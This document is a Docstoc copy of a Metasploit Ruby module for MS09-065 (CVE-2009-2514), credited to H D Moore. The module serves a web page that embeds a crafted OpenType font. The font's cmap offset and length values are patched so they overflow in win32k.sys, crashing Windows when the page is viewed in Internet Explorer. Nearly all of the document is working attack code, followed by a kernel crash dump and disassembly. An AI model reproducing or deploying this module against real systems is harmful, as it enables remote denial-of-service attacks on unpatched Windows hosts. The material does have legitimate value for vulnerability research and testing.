Docstoc

Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution

Document Sample
Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution Powered By Docstoc
					       Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution                                               Page 1/4
  1    ##
  2    # $Id: ms09_065_eot_integer.rb 7470 2009−11−11 23:48:53Z hdm $
  3    ##
  4
  5    ##
  6    # This file is part of the Metasploit Framework and may be subject to
  7    # redistribution and commercial restrictions. Please see the Metasploit
  8    # Framework web site for more information on licensing and terms of use.
  9    # http://metasploit.com/framework/
  10   ##
  11
  12
  13   require ’msf/core’
  14
  15
  16   class Metasploit3 < Msf::Auxiliary
  17
  18            include Msf::Exploit::Remote::HttpServer::HTML
  19
  20           def initialize(info = {})
  21                    super(update_info(info,
  22                               ’Name’                => ’Microsoft Windows EOT Font Table Directory Integer Overflow’,
  23                               ’Description’     => %q{
  24                                          This module exploits an integer overflow flaw in the Microsoft Windows Embedded
  25                               OpenType font parsing code located in win32k.sys. Since the kernel itself parses
  26                               embedded web fonts, it is possible to trigger a BSoD from a normal web page when
  27                               viewed with Internet Explorer.
  28                               },
  29                               ’License’           => MSF_LICENSE,
  30                               ’Author’             => ’hdm’,
  31                               ’Version’           => ’$Revision: 7470 $’,
  32                               ’References’       =>
  33                                          [
  34                                                    [ ’CVE’, ’2009−2514’ ],
  35                                                    [ ’MSB’, ’MS09−065’ ],
  36                                                    [ ’OSVDB’, ’59869’]
  37                                          ],
  38                               ’DisclosureDate’ => ’Nov 10 2009’
  39                    ))
  40                    register_options([
  41                               OptPath.new(’EOTFILE’, [ true, "The EOT template to use to generate the trigger", File.join(Msf::Config.inst
       all_root, "data", "exploits", "pricedown.eot")]),
  42                    ], self.class)
  43
  44            end
  45
  46            def run
  47                        exploit
  48            end
  49
  50            def on_request_uri(cli, request)
  51                    @tag ||= Rex::Text.rand_text_alpha(8)
H D Moore                                                                                                                            11/12/2009
        Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution                                           Page 2/4
  52                     @eot ||= ::File.read(datastore[’EOTFILE’], ::File.size(datastore[’EOTFILE’]))
  53
  54                     if(request.uri =~ /#{@tag}$/)
  55                             content = @eot.dup
  56
  57                                # Only this table entry seems to trigger the bug
  58                                cidx = content.index(’cmap’)
  59
  60                                # Use an offset and a length that overflow when combined
  61                                coff = 0xb0000000
  62                                clen = (0xfffffffe − coff + 0xcc)
  63
  64                                # Patch in the modified offset and length values
  65                                content[cidx + 8, 8] = [ coff, clen ].pack("N*")
  66
  67                                # Send the font on its merry way
  68                                print_status("Sending embedded font to #{cli.peerhost}:#{cli.peerport}...")
  69                                send_response_html(cli, content, { ’Content−Type’ => ’application/octet−stream’ })
  70                      else
  71                                var_title = Rex::Text.rand_text_alpha(6 + rand(32))
  72                                var_body = Rex::Text.rand_text_alpha(64 + rand(32))
  73                                var_font = Rex::Text.rand_text_alpha(2 + rand(6))
  74                                var_face = Rex::Text.rand_text_alpha(2 + rand(32))
  75
  76                            content = %Q|<html><head><title>#{var_title}</title><style type="text/css">
  77    @font−face{ font−family: ’#{var_face}’; src: url(’#{get_resource}/#{var_font}#{@tag}’); }
  78    body {
  79            font−family: ’#{var_face}’;
  80    }
  81    </style></head><body> #{var_body} </body></html>|
  82
  83                                print_status("Sending HTML page with embedded font to #{cli.peerhost}:#{cli.peerport}...")
  84                                send_response_html(cli, content, { ’Content−Type’ => ’text/html’ })
  85                      end
  86             end
  87    end
  88
  89    =begin
  90
  91    #
  92    # Crash dump information
  93    #
  94
  95    READ_ADDRESS:    b0f70072
  96
  97    FAULTING_IP:
  98    win32k!bComputeIDs+28
  99    bf87c9df 8a6702              mov       ah,byte ptr [edi+2]
  100
  101   MM_INTERNAL_CODE:    0
  102
  103   IMAGE_NAME:    win32k.sys
H D Moore                                                                                                                        11/12/2009
        Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution                  Page 3/4
  104
  105   DEBUG_FLR_IMAGE_TIMESTAMP:     45f013f6
  106
  107   MODULE_NAME: win32k
  108
  109   FAULTING_MODULE: bf800000 win32k
  110
  111   DEFAULT_BUCKET_ID:     DRIVER_FAULT
  112
  113   BUGCHECK_STR:   0x50
  114
  115   PROCESS_NAME:   csrss.exe
  116
  117   TRAP_FRAME: b22192e8 −− (.trap 0xffffffffb22192e8)
  118   ErrCode = 00000000
  119   eax=00000000 ebx=00000000 ecx=500000ca edx=00f70010 esi=b22198d8 edi=b0f70070
  120   eip=bf87c9df esp=b221935c ebp=b2219374 iopl=0         nv up ei pl nz na pe nc
  121   cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000                  efl=00010206
  122   win32k!bComputeIDs+0x28:
  123   bf87c9df 8a6702          mov     ah,byte ptr [edi+2]        ds:0023:b0f70072=??
  124   Resetting default scope
  125
  126   LAST_CONTROL_TRANSFER:     from 804f79d7 to 80526fc8
  127
  128   STACK_TEXT:
  129   b2218e24 804f79d7   00000003   b0f70072   00000000   nt!RtlpBreakWithStatusInstruction
  130   b2218e70 804f85c4   00000003   00000000   c0587b80   nt!KiBugCheckDebugBreak+0x19
  131   b2219250 804f8aef   00000050   b0f70072   00000000   nt!KeBugCheck2+0x574
  132   b2219270 8051c0d3   00000050   b0f70072   00000000   nt!KeBugCheckEx+0x1b
  133   b22192d0 8053f90c   00000000   b0f70072   00000000   nt!MmAccessFault+0x8e7
  134   b22192d0 bf87c9df   00000000   b0f70072   00000000   nt!KiTrap0E+0xcc
  135   b2219374 bf87a391   00f70010   b22198d8   b2219a76   win32k!bComputeIDs+0x28
  136   b22193a8 bf87a02b   00f70010   00004d18   00000000   win32k!bVerifyTTF+0xe1
  137   b2219a68 bf879f0e   e234b668   00f70010   00004d18   win32k!bLoadTTF+0x7c
  138   b2219af0 bf879e48   e234b668   00f70010   00004d18   win32k!bLoadFontFile+0x228
  139   b2219b40 bf879911   00000001   e234b660   b2219bf0   win32k!ttfdSemLoadFontFile+0x4c
  140   b2219b70 bf87989f   00000001   e234b660   b2219bf0   win32k!PDEVOBJ::LoadFontFile+0x3a
  141   b2219ba8 bf96370c   00000000   00000000   e234b660   win32k!vLoadFontFileView+0x12b
  142   b2219c5c bf93eda9   e234b660   00000000   00000000   win32k!PUBLIC_PFTOBJ::hLoadMemFonts+0x6a
  143   b2219cb4 bf9488e4   00f70000   e10ff0b0   00000000   win32k!GreAddFontMemResourceEx+0x76
  144   b2219d48 8053ca28   0297cc48   00004d18   00000000   win32k!NtGdiAddFontMemResourceEx+0xb0
  145   b2219d48 7c90eb94   0297cc48   00004d18   00000000   nt!KiFastCallEntry+0xf8
  146   0172f6dc 00000000   00000000   00000000   00000000   ntdll!KiFastSystemCallRet
  147
  148   win32k!bComputeIDs:
  149   bf87c9b7 8bff               mov       edi,edi
  150   bf87c9b9 55                 push      ebp
  151   bf87c9ba 8bec               mov       ebp,esp
  152   bf87c9bc 83ec10             sub       esp,10h
  153   bf87c9bf 8b450c             mov       eax,dword ptr [ebp+0Ch]
  154   bf87c9c2 8b4804             mov       ecx,dword ptr [eax+4]
  155   bf87c9c5 53                 push      ebx
H D Moore                                                                                               11/12/2009
        Microsoft Windows 20002008 Embedded OpenType Font Engine Remote Code Execution   Page 4/4
  156   bf87c9c6   57             push   edi
  157   bf87c9c7   8b38           mov    edi,dword ptr [eax]
  158   bf87c9c9   037d08         add    edi,dword ptr [ebp+8]
  159   bf87c9cc   33db           xor    ebx,ebx
  160   bf87c9ce   33c0           xor    eax,eax
  161   bf87c9d0   83f904         cmp    ecx,4
  162   bf87c9d3   895df8         mov    dword ptr [ebp−8],ebx
  163   bf87c9d6   894dfc         mov    dword ptr [ebp−4],ecx
  164   bf87c9d9   0f82cf000000   jb     win32k!bComputeIDs+0x1be (bf87caae)
  165   bf87c9df   8a6702         mov    ah,byte ptr [edi+2] <−−− the crash above
  166
  167   =end




H D Moore                                                                                11/12/2009

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:97
posted:5/24/2010
language:English
pages:4